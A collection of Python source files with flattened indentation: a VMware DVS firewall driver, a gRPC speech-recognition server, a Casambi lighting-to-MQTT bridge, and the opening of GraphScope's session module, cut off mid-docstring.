dvs_firewall = DVSFirewallUpdater(list_queues, remove_queue)
signal.signal(signal.SIGTERM, dvs_firewall._handle_sigterm)
dvs_firewall.updater_loop()
class DVSFirewallUpdater(object):
def __init__(self, list_queues, remove_queue):
self.pq = PortQueue(list_queues, remove_queue)
self.run_daemon_loop = True
self.pq.port_updater_loop()
def updater_loop(self):
while self.run_daemon_loop:
try:
dvs, r_ports = self.pq.get_remove_tasks()
if dvs and r_ports:
remover(dvs, r_ports)
dvs, ports = self.pq.get_update_tasks()
if dvs and ports:
updater(dvs, ports)
else:
time.sleep(1)
except (vmware_exceptions.VMwareDriverException,
exceptions.VMWareDVSException) as e:
LOG.debug("Exception was handled in firewall updater: %s. "
"Traceback: %s", e, traceback.format_exc())
def _handle_sigterm(self, signum, frame):
LOG.info(_LI("Termination of firewall process called"))
self.run_daemon_loop = False
class PortQueue(object):
def __init__(self, list_queues, remove_queue):
self.list_queues = list_queues
self.remove_queue = remove_queue
self.removed = {}
self.update_store = {}
self.remove_store = {}
self.networking_map = dvs_util.create_network_map_from_config(
CONF.ML2_VMWARE)
# Todo: add roundrobin for active DVS. SlOPS
def get_update_tasks(self, number=5):
for dvs, tasks in six.iteritems(self.update_store):
if tasks:
ret = tasks[:number]
self.update_store[dvs] = tasks[number:]
return dvs, ret
return None, []
def get_remove_tasks(self):
ret = []
for dvs, tasks in six.iteritems(self.remove_store):
for task in tasks:
key = task.get('binding:vif_details', {}).get('dvs_port_key')
if dvs.check_free(key):
ret.append(task)
self.remove_store[dvs].remove(task)
if ret:
return dvs, ret
return None, []
def _get_update_tasks(self):
for queue in self.list_queues:
while not queue.empty():
request = queue.get()
for port in request:
dvs = self.get_dvs(port)
if dvs:
stored_tasks = self.update_store.get(dvs, [])
index = next((i for i, p in enumerate(stored_tasks)
if p['id'] == port['id']), None)
if index is not None:
stored_tasks[index] = port
else:
stored_tasks.append(port)
self.update_store[dvs] = stored_tasks
def _get_remove_tasks(self):
while not self.remove_queue.empty():
port = self.remove_queue.get()
dvs = self.get_dvs(port)
if dvs:
self.remove_store.setdefault(dvs, []).append(port)
self.removed[port['id']] = time.time()
def _cleanup_removed(self):
current_time = time.time()
for port_id, remove_time in self.removed.items():
if current_time - remove_time > CLEANUP_REMOVE_TASKS_TIMEDELTA:
del self.removed[port_id]
def get_dvs(self, port):
dvs_uuid = port.get('binding:vif_details', {}).get('dvs_id')
if dvs_uuid:
dvs = dvs_util.get_dvs_by_uuid(
self.networking_map.values(), dvs_uuid)
else:
port_network = port['network_id']
port_network_name = port.get('binding:vif_details', {}).get(
'dvs_port_group_name')
dvs = dvs_util.get_dvs_by_network(
self.networking_map.values(), port_network, port_network_name)
return dvs
def port_updater_loop(self):
self._get_update_tasks()
self._get_remove_tasks()
for dvs in self.update_store:
self.update_store[dvs] = [item for item in self.update_store[dvs]
if item['id'] not in self.removed]
self._cleanup_removed()
threading.Timer(1, self.port_updater_loop).start()
@dvs_util.wrap_retry
def updater(dvs, port_list):
sg_util.update_port_rules(dvs, port_list)
def remover(dvs, ports_list):
for port in ports_list:
if dvs:
dvs.release_port(port)
class DVSFirewallDriver(firewall.FirewallDriver):
"""DVS Firewall Driver. """
def __init__(self):
self.dvs_ports = {}
self._defer_apply = False
self.list_queues = []
for x in six.moves.range(10):
self.list_queues.append(Queue())
self.remove_queue = Queue()
self.fw_process = Process(
target=firewall_main, args=(self.list_queues, self.remove_queue))
self.fw_process.start()
self.networking_map = dvs_util.create_network_map_from_config(
CONF.ML2_VMWARE)
def _get_port_dvs(self, port):
dvs_uuid = port.get('binding:vif_details', {}).get('dvs_id')
if dvs_uuid:
dvs = dvs_util.get_dvs_by_uuid(
self.networking_map.values(), dvs_uuid)
else:
port_network = port['network_id']
port_network_name = port.get('binding:vif_details', {}).get(
'dvs_port_group_name')
dvs = dvs_util.get_dvs_by_network(
self.networking_map.values(), port_network, port_network_name)
return dvs
def stop_all(self):
self.fw_process.terminate()
def prepare_port_filter(self, ports):
self._process_port_filter(ports)
def apply_port_filter(self, ports):
self._process_port_filter(ports)
def update_port_filter(self, ports):
self._process_port_filter(ports)
def _process_port_filter(self, ports):
LOG.info(_LI("Set security group rules for ports %s"),
[p['id'] for p in ports])
ports_for_update = []
for port in ports:
port_device = port['device']
stored_port_key = self.dvs_ports.get(port_device, {}). \
get('binding:vif_details', {}).get('dvs_port_key')
port_key = port.get('binding:vif_details', {}).get('dvs_port_key')
if port_key and port_key != stored_port_key:
port_dvs = self._get_port_dvs(port)
if port_dvs:
try:
port_info = port_dvs.get_port_info(port)
if port['id'] == port_info.config.name:
self.dvs_ports[port_device] = port
ports_for_update.append(port)
else:
self.dvs_ports.pop(port_device, None)
except exceptions.PortNotFound:
self.dvs_ports.pop(port_device, None)
else:
self.dvs_ports.pop(port_device, None)
else:
self.dvs_ports[port_device] = port
ports_for_update.append(port)
self._apply_sg_rules_for_port(ports_for_update)
def remove_port_filter(self, ports):
LOG.info(_LI("Remove ports with rules"))
for p_id in ports:
port = self.dvs_ports.get(p_id)
if port:
self.remove_queue.put(port)
self.dvs_ports.pop(p_id, None)
@property
def ports(self):
return self.dvs_ports
def _apply_sg_rules_for_port(self, ports):
for port in ports:
queue = self._get_free_queue()
port['security_group_rules'].append(
{u'ethertype': u'IPv6', u'direction': u'ingress',
u'source_ip_prefix': u'::/0', u'protocol': u'ipv6-icmp'})
port = sg_util.filter_port_sg_rules_by_ethertype(port)
queue.put([{'id': port['id'], 'network_id': port['network_id'],
'security_group_rules': port['security_group_rules'],
'binding:vif_details': port['binding:vif_details']}])
def _get_free_queue(self):
shortest_queue = self.list_queues[0]
for queue in self.list_queues:
queue_size = queue.qsize()
if queue_size == 0:
return queue
if queue_size < shortest_queue.qsize():
shortest_queue = queue
return shortest_queue
def update_security_group_rules(self, sg_id, sg_rules):
pass
def security_groups_provider_updated(self):
LOG.info(_LI("Ignoring default security_groups_provider_updated RPC."))
def update_security_group_members(self, sg_id, sg_members):
pass
def security_group_updated(self, action_type, sec_group_ids,
device_id=None):
pass
def filter_defer_apply_on(self):
pass
def filter_defer_apply_off(self):
pass
|
server.py | import grpc
import torch
import numpy as np
import collections
import time
import threading
from marshmallow.exceptions import ValidationError
from . import speech_pb2, speech_pb2_grpc
from patter import ModelFactory
from patter.config import ServerConfiguration
from patter.data import AudioSegment
from patter.decoder import DecoderFactory
from patter.data.features import PerturbedSpectrogramFeaturizer
class SpeechServicer(speech_pb2_grpc.SpeechServicer):
def __init__(self, model_path, decoder_config, language="en-US", cuda=False):
# initialize the model to test
self._model = ModelFactory.load(model_path)
self._decoder = DecoderFactory.create(decoder_config, self._model.labels)
self._featurizer = PerturbedSpectrogramFeaturizer.from_config(self._model.input_cfg)
self._language = language
self._use_cuda = cuda
if self._use_cuda:
self._model = self._model.cuda()
self._model.eval()
def _raw_data_to_samples(self, data, sample_rate=16000, encoding=None):
# TODO: support other encodings
if sample_rate == 16000 and encoding == speech_pb2.RecognitionConfig.LINEAR16:
signal = np.frombuffer(data, dtype=np.int16)
else:
raise ValueError("Unsupported audio data configuration")
signal = None
return signal
def Recognize(self, request, context):
print("Handling batch request.")
config = request.config
# check audio format (sample rate, encoding) to convert if necessary
if config.language_code != self._language:
context.set_code(grpc.StatusCode.FAILED_PRECONDITION)
context.set_details('Requested unsupported language')
return
max_alternatives = max(min(config.max_alternatives, 30), 1)
# get samples
samples = self._raw_data_to_samples(request.audio.content, sample_rate=config.sample_rate_hertz, encoding=config.encoding)
segment = AudioSegment(samples, config.sample_rate_hertz, target_sr=self._model.input_cfg['sample_rate'])
# featurize
features = self._featurizer.process_segment(segment)
features = features.unsqueeze(0).unsqueeze(0)
# run model
output, output_len = self._model(torch.autograd.Variable(features, requires_grad=False),
torch.autograd.Variable(torch.IntTensor([features.size(3)]), requires_grad=False))
output = output.transpose(0, 1)
# decode
decoded_output, offsets, scores = self._decoder.decode(output.data, output_len.data, num_results=max_alternatives)
# build output message
alternatives = []
transcripts = set([])
for idx in range(min(max_alternatives, len(decoded_output[0]))):
transcript = decoded_output[0][idx].strip().lower()
if transcript not in transcripts:
transcripts.add(transcript)
else:
continue
transcript_words = transcript.split()
words = []
if idx == 0:
for w in transcript_words:
words.append(speech_pb2.WordInfo(word=w))
alternatives.append(speech_pb2.SpeechRecognitionAlternative(transcript=transcript, confidence=scores[0][idx], words=words))
# may be multiple results if there are multiple chunks created
results = [speech_pb2.SpeechRecognitionResult(alternatives=alternatives)]
response = speech_pb2.RecognizeResponse(results=results)
return response
def StreamingRecognize(self, request_iterator, context):
print("Handling stream request...")
config_wrapper = request_iterator.next()
if not config_wrapper.HasField("streaming_config"):
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
context.set_details('First StreamingRequest must be a configuration request')
return
# return an error
stream_config = config_wrapper.streaming_config
# check audio format (sample rate, encoding) to convert if necessary
if stream_config.config.language_code != self._language:
context.set_code(grpc.StatusCode.FAILED_PRECONDITION)
context.set_details('Requested unsupported language')
return
sample_buffer = collections.deque()
done = False
last_incoming = time.time()
def read_incoming():
try:
while 1:
received = next(request_iterator)
samples = self._raw_data_to_samples(received.audio_content, sample_rate=stream_config.config.sample_rate_hertz, encoding=stream_config.config.encoding)
sample_buffer.extend(samples)
last_incoming = time.time()
except StopIteration:
print("reached end")
return
except ValueError:
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Unable to handle requested audio type')
raise ValueError('Unable to handle requested audio type')
thread = threading.Thread(target=read_incoming)
thread.daemon = True
thread.start()
last_check = time.time()
full_transcript = ""
hidden = None
result = None
last_buffer_size = -1
while 1:
stream_done = time.time()-last_incoming > self._flush_time
if len(sample_buffer) > self._min_buffer or (time.time()-last_check >= self._flush_time and len(sample_buffer) > self._min_buffer):
last_check = time.time()
signal = self._get_np_from_deque(sample_buffer, size=min(len(sample_buffer), self._max_buffer), reserve=int(0.4*self._model_sample_rate))
spect = self._parser.parse_audio_data(signal).contiguous()
spect = spect.view(1, 1, spect.size(0), spect.size(1))
out, _ = self._model(torch.autograd.Variable(spect, volatile=True), hidden)
out = out.transpose(0, 1) # TxNxH
decoded_output, _, _, _ = self._decoder.decode(out.data[:-19,:,:])
full_transcript += decoded_output[0][0]
alt = speech_pb2.SpeechRecognitionAlternative(transcript=full_transcript)
result = speech_pb2.StreamingRecognitionResult(alternatives=[alt], is_final=done)
out = speech_pb2.StreamingRecognizeResponse(results=[result])
# if stream_done:
# return out
yield out
else:
last_check = time.time()
time.sleep(0.01)
@classmethod
def from_config(cls, server_config):
try:
cfg = ServerConfiguration().load(server_config)
if len(cfg.errors) > 0:
raise ValidationError(cfg.errors)
except ValidationError as err:
raise err
return cls(cfg.data['model_path'], cfg.data['decoder'], language=cfg.data['language'], cuda=cfg.data['cuda'])
|
server.py | #!/usr/bin/python3
import casambi
import yaml
import logging
import logging.handlers
import json
import time
import websocket
import paho.mqtt.client as mqtt
import queue
import multiprocessing
import socket
import re
from time import sleep
from setproctitle import setproctitle
def parse_config(config_file='casambi.yaml'):
config = None
with open(config_file, 'r') as stream:
config = yaml.safe_load(stream)
if 'api_key' not in config:
raise casambi.ConfigException('api_key is not present in configuration')
if 'email' not in config:
raise casambi.ConfigException('email is not present in configuration')
if 'network_password' not in config:
raise casambi.ConfigException('api_key is not present in configuration')
if 'user_password' not in config:
raise casambi.ConfigException('api_key is not present in configuration')
return config
def set_unit_value(api_key, email, network_password, user_password, unit_id):
user_session_id = casambi.create_user_session(email=email, api_key=api_key, user_password=user_password)
network_ids = casambi.create_network_session(api_key=api_key, email=email, network_password=network_password)
wire_id = 1
network_id = list(network_ids)[0]
network_information = casambi.get_network_information(user_session_id=user_session_id, network_id=network_id, api_key=api_key)
web_sock = casambi.ws_open_message(user_session_id=user_session_id, network_id=network_id, api_key=api_key)
casambi.turn_unit_on(unit_id=unit_id, web_sock=web_sock, wire_id=wire_id)
casambi.ws_close_message(web_sock=web_sock, wire_id=wire_id)
def casambi_worker(write_queue, command_queue, logger_queue, api_key, email, network_password, user_password, verbose=False):
setproctitle('casambi_worker')
worker_configurer(logger_queue)
innerlogger = logging.getLogger('worker')
user_session_id = casambi.create_user_session(email=email, api_key=api_key, user_password=user_password)
network_ids = casambi.create_network_session(api_key=api_key, email=email, network_password=network_password)
wire_id = 1
network_id = list(network_ids)[0]
units = {}
while(True):
network_information = casambi.get_network_information(user_session_id=user_session_id, network_id=network_id, api_key=api_key)
network_units = network_information['units']
for key, value in network_units.items():
unit_id = "{}".format(key)
if unit_id in units:
continue #already known
unit = {}
unit['name'] = (value['name']).strip()
unit['value'] = 0 # Lets guess the unit is off
units[unit_id] = unit
innerlogger.debug("casambi_worker: units: {}".format(units))
write_queue.put(units)
web_sock = casambi.ws_open_message(user_session_id=user_session_id, network_id=network_id, api_key=api_key, wire_id=wire_id)
web_sock.settimeout(0.1)
while(True):
casambi_msg = None
command_msgs = None
try:
casambi_msg = web_sock.recv()
except websocket._exceptions.WebSocketConnectionClosedException:
innerlogger.info("casambi_worker: Socket closed, reopening")
break
except socket.timeout:
pass
except websocket._exceptions.WebSocketTimeoutException:
pass
except TimeoutError:
innerlogger.info("casambi_worker: Socket closed, reopening")
break
try:
command_msgs = command_queue.get(block=False)
except queue.Empty:
pass
if command_msgs:
for message in command_msgs:
value = message['value']
unit_id = message['id']
name = units[unit_id]['name']
innerlogger.debug("casambi_worker: recieved command message: \"{}\"".format(message))
#set_unit_value(api_key, email, network_password, user_password, unit_id)
#casambi.set_unit_value(web_sock=web_sock, unit_id=unit_id, value=value, wire_id=wire_id)
target_controls = { 'Dimmer': {'value': value }}
casambi_message = {
"wire": wire_id,
"method": 'controlUnit',
"id": int(unit_id),
"targetControls": target_controls
}
json_msg = json.dumps(casambi_message)
web_sock.send(json_msg)
innerlogger.debug("casambi_worker: target_controls: {} casambi_message: {} json_msg {}".format(target_controls, casambi_message, json_msg))
if (casambi_msg == '') or not casambi_msg:
continue
#result = __clean_up_json(msg=result)
data = None
try:
data = json.loads(casambi_msg)
except json.decoder.JSONDecodeError as err:
innerlogger.error("casambi_worker: Caught exception, data: \"\n\n{}\n\n\", exception: {}".format(data, err))
continue
innerlogger.debug("casambi_worker: recieved data: {}".format(data))
# 'controls': [{'type': 'Overheat', 'status': 'ok'}, {'type': 'Dimmer', 'value': 0.0}], 'sensors': [], 'method': 'unitChanged', 'online': False, 'id': 12, 'on': True, 'status': 'ok'}
dimmer_value = 0
unit_id = -1
if 'controls' in data:
controls = data['controls']
for control in controls:
if control['type'] == 'Dimmer':
dimmer_value = control['value']
if 'id' in data:
unit_id = "{}".format(data['id'])
if unit_id != -1:
if (unit_id in units):
units[unit_id]['id'] = unit_id
units[unit_id]['value'] = dimmer_value
write_queue.put(units)
else:
innerlogger.debug("casambi_worker: unknown data: {}".format(data))
innerlogger.debug("casambi_worker: units: {}".format(units))
def mqtt_worker(casambi_reader_queue, mqtt_request_queue, logger_queue, mqtt_server, mqtt_server_port, mqtt_user, mqtt_password, verbose=False):
'''
- platform: mqtt
name: "Spot köksö"
state_topic: "casambi/light/7/status"
command_topic: "casambi/light/7/switch"
payload_off: "0"
brightness_state_topic: 'casambi/light/7/brightness'
brightness_command_topic: 'casambi/light/7/brightness/set'
on_command_type: 'brightness'
'''
setproctitle('casambi_mqtt_worker')
worker_configurer(logger_queue)
innerlogger = logging.getLogger('worker')
client = mqtt.Client()
client.username_pw_set(mqtt_user, password=mqtt_password)
topics = []
client.on_connect = on_connect
client.on_message = on_message
client.user_data_set((topics, mqtt_request_queue, innerlogger))
innerlogger.debug("mqtt_worker: Connecting to MQTT server {}:{}".format(mqtt_server, mqtt_server_port))
client.connect(mqtt_server, 1883, 60)
# Blocking call that processes network traffic, dispatches callbacks and
# handles reconnecting.
# Other loop*() functions are available that give a threaded interface and a
# manual interface.
#client.loop_forever()
while(True):
client.loop(.1)
casambi_read_msg = None
try:
casambi_read_msg = casambi_reader_queue.get(block=True, timeout=.1)
except queue.Empty:
pass
if casambi_read_msg:
innerlogger.debug("mqtt_worker: Read following from Casambi queue: {}".format(casambi_read_msg))
if isinstance(casambi_read_msg, dict):
for id, item in casambi_read_msg.items():
payload = None
topic_change = False
brigness = 0
name = item['name']
status_topic = "casambi/light/{}/status".format(id)
command_topic = "casambi/light/{}/switch".format(id)
brightness_state_topic = "casambi/light/{}/brightness".format(id)
brightness_command_topic = "casambi/light/{}/brightness/set".format(id)
name_topic = "casambi/light/{}/name".format(id)
if item['value'] == 0:
payload = 'OFF'
else:
payload = 'ON'
brigness = round(item['value'] * 255)
innerlogger.debug("mqtt_worker: Sending topic=\"{}\" payload=\"{}\" (light name: {})".format(status_topic, payload, name))
client.publish(topic=status_topic, payload=payload)
client.publish(topic=brightness_state_topic, payload=brigness)
client.publish(topic=name_topic, payload=name)
if not (command_topic in topics):
topics.append(command_topic)
innerlogger.debug("mqtt_worker: subscribing on topic=\"{}\"".format(command_topic))
client.subscribe(command_topic, qos=0)
topic_change = True
if not (brightness_command_topic in topics):
topics.append(brightness_command_topic)
innerlogger.debug("mqtt_worker: subscribing on topic=\"{}\"".format(brightness_command_topic))
client.subscribe(brightness_command_topic, qos=0)
topic_change = True
if topic_change:
client.user_data_set((topics, mqtt_request_queue, innerlogger))
def on_message(client, userdata, message):
digit_regexp = re.compile('\d+')
payload = (message.payload).decode('UTF-8')
(topics, mqtt_request_queue, innerlogger) = userdata
# Off message:
# Received message 'b'0'' on topic 'casambi/light/1/switch' with QoS 0
# on_message: Received message 'b'255'' on topic 'casambi/light/12/brightness/set' with QoS 0
# worker DEBUG on_message: Received message 'b'OFF'' on topic 'casambi/light/12/switch' with QoS 0
innerlogger.debug("on_message: Received message '" + payload + "' on topic '"
+ message.topic + "' with QoS " + str(message.qos))
parts = (message.topic).split('/')
unit_id = parts[2]
messages = []
if parts[-1] == 'switch' and (digit_regexp.match(payload)):
messages = []
unit = {}
unit['value'] = round(float(payload)/255, 1)
unit['id'] = unit_id
if unit['value'] == '1':
unit['value'] = 1
elif unit['value'] == '0':
unit['value'] = 0
messages.append(unit)
elif parts[-1] == 'switch' and payload == "OFF":
unit = {}
unit['value'] = 0
unit['id'] = unit_id
messages.append(unit)
elif parts[-1] == 'switch' and payload == "ON":
unit = {}
unit['value'] = 1
unit['id'] = unit_id
messages.append(unit)
elif parts[-1] == 'set' and parts[-2] == 'brightness':
messages = []
unit = {}
unit['value'] = round(float(payload)/255, 1)
unit['id'] = unit_id
if unit['value'] == 1:
unit['value'] = 1
elif unit['value'] == 0:
unit['value'] = 0
messages.append(unit)
else:
innerlogger.debug("on_message: unhandled message '" + payload + "' on topic '"
+ message.topic + "' with QoS " + str(message.qos))
innerlogger.debug("on_message: unit_id: {} parts: {} messages: {}".format(unit_id, parts, messages))
if len(messages) != 0:
innerlogger.debug("on_message: putting following messages on queue: {}".format(messages))
mqtt_request_queue.put(messages)
def on_connect(client, userdata, flags, rc):
# Subscribing in on_connect() means that if we lose the connection and
# reconnect then subscriptions will be renewed.
(topics, mqtt_request_queue, innerlogger) = userdata
innerlogger.debug("on_connect: Connected with result code " + str(rc))
client.subscribe('casambi', qos=0)
for topic in topics:
innerlogger.debug("on_connect: subscribing on topic=\"{}\"".format(topic))
client.subscribe(topic, qos=0)
def worker_configurer(queue):
h = logging.handlers.QueueHandler(queue) # Just the one handler needed
root = logging.getLogger()
root.addHandler(h)
# send all messages, for demo; no other level or filter logic applied.
root.setLevel(logging.DEBUG)
def listener_configurer(verbose=False):
root = logging.getLogger()
#file_handler = logging.handlers.RotatingFileHandler('mptest.log', 'a', 300, 10)
console_handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(process)d %(processName)-10s %(name)-8s %(levelname)-8s %(message)s')
#file_handler.setFormatter(formatter)
console_handler.setFormatter(formatter)
#root.addHandler(file_handler)
root.addHandler(console_handler)
if verbose:
root.setLevel(logging.DEBUG)
else:
root.setLevel(logging.INFO)
def logger_worker(queue, verbose):
setproctitle('casambi_logger')
listener_configurer(verbose=verbose)
while True:
while not queue.empty():
record = queue.get()
logger = logging.getLogger(record.name)
logger.handle(record) # No level or filter logic applied - just do it!
sleep(0.5)
def main():
verbose = False
config = parse_config()
api_key = config['api_key']
email = config['email']
network_password = config['network_password']
user_password = config['user_password']
mqtt_password = config['mqtt_password']
mqtt_server = config['mqtt_server']
mqtt_server_port = config['mqtt_server_port']
mqtt_user = config['mqtt_user']
if 'verbose' in config:
verbose = config['verbose']
casambi_reader_queue = multiprocessing.Queue()
mqtt_request_queue = multiprocessing.Queue()
logger_queue = multiprocessing.Queue()
casambi_process = multiprocessing.Process(target=casambi_worker, args=(casambi_reader_queue, mqtt_request_queue, logger_queue, api_key, email, network_password, user_password, verbose), name='Casambi')
#casambi_process.daemon=True
casambi_process.start()
mqtt_process = multiprocessing.Process(target=mqtt_worker, args=(casambi_reader_queue, mqtt_request_queue, logger_queue, mqtt_server, mqtt_server_port, mqtt_user, mqtt_password, verbose), name='MQTT')
#mqtt_process.daemon=True
mqtt_process.start()
logger_process = multiprocessing.Process(target=logger_worker, args=(logger_queue, verbose), name='Logger')
#logger_process.daemon=True
logger_process.start()
if __name__ == "__main__":
main()
|
session.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Manage sessions to the GraphScope coordinator.
"""
import atexit
import base64
import contextlib
import copy
import json
import logging
import os
import random
import sys
import threading
import time
import warnings
from queue import Empty as EmptyQueue
try:
from kubernetes import client as kube_client
from kubernetes import config as kube_config
except ImportError:
kube_client = None
kube_config = None
import graphscope
from graphscope.client.rpc import GRPCClient
from graphscope.client.utils import CaptureKeyboardInterrupt
from graphscope.client.utils import GSLogger
from graphscope.client.utils import set_defaults
from graphscope.config import GSConfig as gs_config
from graphscope.deploy.hosts.cluster import HostsClusterLauncher
from graphscope.deploy.kubernetes.cluster import KubernetesClusterLauncher
from graphscope.framework.errors import ConnectionError
from graphscope.framework.errors import FatalError
from graphscope.framework.errors import GRPCError
from graphscope.framework.errors import InteractiveEngineInternalError
from graphscope.framework.errors import InvalidArgumentError
from graphscope.framework.errors import K8sError
from graphscope.framework.errors import LearningEngineInternalError
from graphscope.framework.errors import check_argument
from graphscope.framework.graph import Graph
from graphscope.framework.operation import Operation
from graphscope.interactive.query import InteractiveQuery
from graphscope.interactive.query import InteractiveQueryStatus
from graphscope.proto import message_pb2
from graphscope.proto import op_def_pb2
from graphscope.proto import types_pb2
DEFAULT_CONFIG_FILE = os.environ.get(
"GS_CONFIG_PATH", os.path.expanduser("~/.graphscope/session.json")
)
_session_dict = {}
logger = logging.getLogger("graphscope")
class Session(object):
"""A class for interacting with GraphScope graph computation service cluster.
A :class:`Session` object encapsulates the environment in which :class:`Operation`
objects are executed/evaluated.
A session may own resources. It is important to release these resources when
they are no longer required. To do this, invoke the :meth:`close` method
on the session.
A Session can register itself as default session with :meth:`as_default`, and all operations
after that will use the default session. Session deregister itself as a default session
when closed.
The following example demonstrates its usage:
.. code:: python
>>> import graphscope as gs
>>> # use session object explicitly
>>> sess = gs.session()
>>> g = sess.g()
>>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
>>> r = s.sssp(g, 4)
>>> s.close()
>>> # or use a session as default
>>> s = gs.session().as_default()
>>> g = g()
>>> pg = g.project(vertices={'v': []}, edges={'e': ['dist']})
>>> r = gs.sssp(pg, 4)
>>> s.close()
We support setup a service cluster and create a RPC session in following ways:
- GraphScope graph computation service run in cluster managed by kubernetes.
>>> s = graphscope.session()
Also, :class:`Session` provides several keyword params for users to define the cluster.
You may use the param :code:`k8s_gs_image` to specify the image for all engine pod, and
param :code:`k8s_engine_cpu` or :code:`k8s_engine_mem` to specify the resources. More,
you can find all params detail in :meth:`__init__` method.
>>> s = graphscope.session(
... k8s_gs_image="registry.cn-hongkong.aliyuncs.com/graphscope/graphscope:latest",
... k8s_vineyard_cpu=0.1,
... k8s_vineyard_mem="256Mi",
... vineyard_shared_mem="4Gi",
... k8s_engine_cpu=0.1,
... k8s_engine_mem="256Mi")
- or all params can be provided by a json configuration file or configuration dict.
>>> s = graphscope.session(config='/tmp/config.json')
>>> # Or
>>> s = graphscope.session(config={'k8s_engine_cpu': 5, 'k8s_engine_mem': '5Gi'})
"""
@set_defaults(gs_config)
def __init__(
self,
config=None,
cluster_type=gs_config.cluster_type,
addr=gs_config.addr,
num_workers=gs_config.num_workers,
preemptive=gs_config.preemptive,
k8s_namespace=gs_config.k8s_namespace,
k8s_service_type=gs_config.k8s_service_type,
k8s_gs_image=gs_config.k8s_gs_image,
k8s_etcd_image=gs_config.k8s_etcd_image,
k8s_gie_graph_manager_image=gs_config.k8s_gie_graph_manager_image,
k8s_zookeeper_image=gs_config.k8s_zookeeper_image,
k8s_image_pull_policy=gs_config.k8s_image_pull_policy,
k8s_image_pull_secrets=gs_config.k8s_image_pull_secrets,
k8s_coordinator_cpu=gs_config.k8s_coordinator_cpu,
k8s_coordinator_mem=gs_config.k8s_coordinator_mem,
k8s_etcd_num_pods=gs_config.k8s_etcd_num_pods,
k8s_etcd_cpu=gs_config.k8s_etcd_cpu,
k8s_etcd_mem=gs_config.k8s_etcd_mem,
k8s_zookeeper_cpu=gs_config.k8s_zookeeper_cpu,
k8s_zookeeper_mem=gs_config.k8s_zookeeper_mem,
k8s_gie_graph_manager_cpu=gs_config.k8s_gie_graph_manager_cpu,
k8s_gie_graph_manager_mem=gs_config.k8s_gie_graph_manager_mem,
k8s_vineyard_daemonset=gs_config.k8s_vineyard_daemonset,
k8s_vineyard_cpu=gs_config.k8s_vineyard_cpu,
k8s_vineyard_mem=gs_config.k8s_vineyard_mem,
vineyard_shared_mem=gs_config.vineyard_shared_mem,
k8s_engine_cpu=gs_config.k8s_engine_cpu,
k8s_engine_mem=gs_config.k8s_engine_mem,
k8s_mars_worker_cpu=gs_config.mars_worker_cpu,
k8s_mars_worker_mem=gs_config.mars_worker_mem,
k8s_mars_scheduler_cpu=gs_config.mars_scheduler_cpu,
k8s_mars_scheduler_mem=gs_config.mars_scheduler_mem,
k8s_volumes=gs_config.k8s_volumes,
k8s_waiting_for_delete=gs_config.k8s_waiting_for_delete,
timeout_seconds=gs_config.timeout_seconds,
dangling_timeout_seconds=gs_config.dangling_timeout_seconds,
with_mars=gs_config.with_mars,
**kw
):
"""Construct a new GraphScope session.
Args:
config (dict or str, optional): The configuration dict or file about how to launch the GraphScope instance.
For str, it will identify it as a path and read the configuration file to build a
session if file exist. If not specified, the global default configuration
:code:`DEFAULT_CONFIG_FILE` will be used, which get value of GS_CONFIG_PATH
in environment. Note that it will overwrite explicit parameters. Defaults to None.
addr (str, optional): The endpoint of a pre-launched GraphScope instance with '<ip>:<port>' format.
A new session id will be generated for each session connection.
cluster_type (str, optional): Deploy GraphScope instance on hosts or k8s cluster. Defaults to k8s.
Available options: "k8s" and "hosts". Note that only support deployed on localhost with hosts mode.
num_workers (int, optional): The number of workers to launch GraphScope engine. Defaults to 2.
preemptive (bool, optional): If True, GraphScope instance will treat resource params (e.g. k8s_coordinator_cpu)
as limits and provide the minimum available value as requests, but this will make pod has a `Burstable` QOS,
which can be preempted by other pods with high QOS. Otherwise, it will set both requests and limits with the
same value.
k8s_namespace (str, optional): Contains the namespace to create all resource inside.
If param missing, it will try to read namespace from kubernetes context, or
a random namespace will be created and deleted if namespace not exist.
Defaults to None.
k8s_service_type (str, optional): Type determines how the GraphScope service is exposed.
Valid options are NodePort, and LoadBalancer. Defaults to NodePort.
k8s_gs_image (str, optional): The GraphScope engine's image.
k8s_etcd_image (str, optional): The image of etcd, which used by vineyard.
k8s_image_pull_policy (str, optional): Kubernetes image pull policy. Defaults to "IfNotPresent".
k8s_image_pull_secrets (list[str], optional): A list of secret name used to authorize pull image.
k8s_gie_graph_manager_image (str, optional): The GraphScope interactive engine's graph manager image.
k8s_zookeeper_image (str, optional): The image of zookeeper, which used by GIE graph manager.
k8s_vineyard_daemonset (str, optional): The name of vineyard Helm deployment to use. GraphScope will try to
discovery the daemonset from kubernetes cluster, then use it if exists, and fallback to launching
a bundled vineyard container otherwise.
k8s_vineyard_cpu (float, optional): Minimum number of CPU cores request for vineyard container. Defaults to 0.5.
k8s_vineyard_mem (str, optional): Minimum number of memory request for vineyard container. Defaults to '512Mi'.
vineyard_shared_mem (str, optional): Init size of vineyard shared memory. Defaults to '4Gi'.
k8s_engine_cpu (float, optional): Minimum number of CPU cores request for engine container. Defaults to 0.5.
k8s_engine_mem (str, optional): Minimum number of memory request for engine container. Defaults to '4Gi'.
k8s_coordinator_cpu (float, optional): Minimum number of CPU cores request for coordinator pod. Defaults to 1.0.
k8s_coordinator_mem (str, optional): Minimum number of memory request for coordinator pod. Defaults to '4Gi'.
k8s_etcd_num_pods (int, optional): The number of etcd pods. Defaults to 3.
k8s_etcd_cpu (float, optional): Minimum number of CPU cores request for etcd pod. Defaults to 0.5.
k8s_etcd_mem (str, optional): Minimum number of memory request for etcd pod. Defaults to '128Mi'.
k8s_zookeeper_cpu (float, optional):
Minimum number of CPU cores request for zookeeper container. Defaults to 0.5.
k8s_zookeeper_mem (str, optional):
Minimum number of memory request for zookeeper container. Defaults to '256Mi'.
k8s_gie_graph_manager_cpu (float, optional):
Minimum number of CPU cores request for graphmanager container. Defaults to 1.0.
k8s_gie_graph_manager_mem (str, optional):
